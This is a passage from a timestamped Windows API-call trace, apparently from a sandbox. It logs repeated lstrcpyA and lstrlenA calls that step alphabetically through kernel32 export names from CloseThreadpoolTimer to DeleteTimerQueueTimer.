lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.326] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.326] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.326] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.326] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.327] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.327] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.327] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.327] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.327] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.327] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.327] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.327] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.327] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.327] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.327] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.327] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.327] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.327] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.327] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.327] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.327] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.327] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.327] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.328] lstrlenA (lpString="COPYFILEA") returned 9 [0085.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.328] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.328] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.328] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.328] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.328] lstrlenA (lpString="COPYFILEW") returned 9 [0085.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.328] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.328] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.328] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.328] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.328] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.328] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.328] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.329] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.329] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.329] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.329] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.329] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.329] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.329] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.329] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.329] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.329] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.329] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.329] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.329] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.329] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.329] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.330] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.330] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.330] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.330] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.330] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.330] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.330] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.330] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.330] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.330] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.330] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.330] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.330] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.330] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.330] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.330] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.330] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.330] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.330] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.331] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.331] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.331] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.331] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.331] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.331] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.331] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.331] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.331] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.331] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.331] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.331] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.331] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.331] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.331] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.331] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.331] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.331] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.332] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.332] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.332] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.332] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.332] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.332] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.332] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.332] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.332] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.332] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.332] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.332] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.332] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.332] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.332] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.332] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.332] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.332] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.332] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.333] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.333] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.333] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.333] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.333] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.333] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.333] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.333] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.333] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.333] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.333] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.333] lstrlenA (lpString="DELETEATOM") returned 10 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.333] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.333] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.333] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.333] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.333] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.333] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.333] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.334] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.334] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.334] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.334] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.334] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.334] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.334] lstrcpyA 